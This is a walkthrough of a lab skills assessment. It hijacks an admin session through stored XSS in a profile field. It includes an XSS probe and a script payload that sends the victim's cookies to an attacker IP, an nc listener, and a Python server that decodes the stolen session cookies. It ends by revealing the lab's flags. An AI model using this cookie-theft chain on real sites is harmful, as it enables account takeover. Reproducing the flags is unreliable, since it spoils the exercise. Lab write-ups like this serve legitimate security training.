Skills Assessment
Task
You are currently participating in a bug bounty program.
- The only URL in scope is http://minilab.htb.net
- Attacking end-users through client-side attacks is in scope for this particular bug bounty program.
- Test account credentials:
- Email: heavycat106
- Password: rocknrol
- Through dirbusting, you identified the following endpoint: http://minilab.htb.net/submit-solution
Find a way to hijack an admin’s session. Once you do that, answer the two questions below.
- Read the flag residing in the admin's public profile. Answer format: [string]
- Go through the PCAP file residing in the admin's public profile and identify the flag. Answer format: FLAG{string}
Attempt
After logging in, I checked the login request. The auth cookie was quite long and didn't look easily crackable (e.g. an unsalted MD5 hash), so forging it was not a promising route.
On http://minilab.htb.net/app/, I tried XSS against the forms.
Payload:
<img src=x onerror=alert(window.origin)>
The Telephone and Country fields didn't validate the input.
Accessing http://minilab.htb.net/[email protected] produced the popup showing http://minilab.htb.net. The Country field renders as a broken image, so the payload is saved with the profile and echoed back unescaped on every visit: this is stored XSS, which is exactly what is needed to hit another user.
Now I need a cookie stealer:
<script>fetch(`http://10.10.14.102:9000?cookie=${btoa(document.cookie)}`)</script>
The backticks matter here: ${...} interpolation only works inside a template literal, so with single or double quotes the request would carry the literal text ${btoa(document.cookie)} instead of the cookie. This also relies on the auth-session cookie not being marked HttpOnly; an HttpOnly cookie never shows up in document.cookie.
Also set up nc:
nc -lnvp 9000
Let's confirm that I can receive my own cookie first (it arrives base64 encoded):
YXV0aC1zZXNzaW9uPXMlM0FBejFUNFpIYVVLbXBmSml0SjhFNW1iaFlQaWs4UWVkLS5hRXlFOFh5TFdvcURtZXBRMVpvSVZCdkpPSUtuUDlFSm5rJTJCNHJQc1RLams=
Decoded and got this:
auth-session=s%3AAz1T4ZHaUKmpfJitJ8E5mbhYPik8Qed-.aEyE8XyLWoqDmepQ1ZoIVBvJOIKnP9EJnk%2B4rPsTKjk
This matches my cookie value. Note the shape: s%3A (s: once URL-decoded) followed by a session ID, a dot, and a signature (the %2B is a + inside base64). That is the format used by Express signed cookies, i.e. an identifier plus an HMAC computed with a server-side secret, which is why forging a cookie is not realistic and stealing the admin's is the way forward.
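As an added example (not part of the original write-up), here is a small Python listener that replaces the nc listener and does the decoding automatically: it pulls the cookie= parameter out of the query string, base64-decodes it, URL-decodes each cookie value, and, when a value has the s:<id>.<sig> shape of an Express signed cookie, splits it into session ID and signature. The bind address 0.0.0.0:9000 is an assumption matching the listener above; the sample base64 value in the docstring is the one captured above.

```python
import base64
import http.server
import re
from urllib.parse import unquote, urlparse


def decode_exfil_query(query: str, param: str = "cookie") -> dict:
    """Recover the victim's cookies from the exfil request's query string.

    The payload sends ?cookie=<base64(document.cookie)>. The base64 text is
    taken raw rather than via parse_qs (which would turn a '+' into a space),
    any padding the browser may have dropped is restored, and the cookie
    string is split into a name -> value map with each value URL-decoded the
    way the server originally set it (s%3A -> s:, %2B -> +).

    Example query (captured above):
      cookie=YXV0aC1zZXNzaW9uPXMlM0FB...NHJQc1RLams=
    """
    match = re.search(r"(?:^|&)" + re.escape(param) + r"=([^&]*)", query)
    if not match:
        return {}
    raw = unquote(match.group(1)).replace(" ", "+")  # undo plus-to-space if a proxy applied it
    raw += "=" * (-len(raw) % 4)                      # restore stripped padding
    cookie_str = base64.b64decode(raw).decode("utf-8", "replace")
    cookies = {}
    for part in cookie_str.split(";"):
        if "=" not in part:
            continue
        name, value = part.strip().split("=", 1)
        cookies[name] = unquote(value)
    return cookies


def split_signed_cookie(value: str):
    """Return (session_id, signature) if value has the Express signed-cookie
    shape s:<id>.<sig>, else None. Only the shape is checked; the signature
    cannot be verified without the server secret."""
    if not value.startswith("s:") or "." not in value[2:]:
        return None
    sid, sig = value[2:].rsplit(".", 1)
    return sid, sig


class ExfilHandler(http.server.BaseHTTPRequestHandler):
    """Log decoded cookies for every GET and answer 204 so nothing is displayed."""

    def do_GET(self):
        cookies = decode_exfil_query(urlparse(self.path).query)
        for name, value in cookies.items():
            signed = split_signed_cookie(value)
            extra = f"  (signed cookie: id={signed[0]} sig={signed[1]})" if signed else ""
            print(f"[{self.client_address[0]}] {name}={value}{extra}")
        self.send_response(204)
        self.end_headers()

    def log_message(self, *args):
        # Keep stdout to the decoded cookies only.
        pass


if __name__ == "__main__":
    # Assumption: same interface/port as the nc listener in the write-up.
    http.server.HTTPServer(("0.0.0.0", 9000), ExfilHandler).serve_forever()
```

Run it in place of nc; the admin's hit shows up already URL-decoded, ready to paste into the browser's cookie editor or a Burp request.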
Now submit the profile URL through the endpoint found by dirbusting, so that the admin visits the page carrying the stored payload: http://minilab.htb.net/submit-solution?url=http://minilab.htb.net/[email protected]
Got this:
YXV0aC1zZXNzaW9uPXMlM0F0RkRUUC1GYlM0RGdNWVZmbG91Y2t0eEI5azlWNTNSSC55T3pKSHlMeVI5V1piOVM1RWtYbFp2WTJJTU1NNFdRV0NaR1VNcktvT2xR
Decoded:
auth-session=s%3AtFDTP-FbS4DgMYVfloucktxB9k9V53RH.yOzJHyLyR9WZb9S5EkXlZvY2IMMM4WQWCZGUMrKoOlQ
Replacing my own auth-session cookie with this value, I was logged in as the admin. I changed the admin's profile visibility to public, and the first flag was on the share page.
Next, I turned off Burp, downloaded the PCAP file from the admin's profile and opened it in Wireshark. Ctrl+F (Find Packet) with the search type set to String and the search term flag located the packet carrying the flag:
token=FLAG{SUCCESS_YOU_PWN3D_US_H0PE_YOU_ENJ0YED}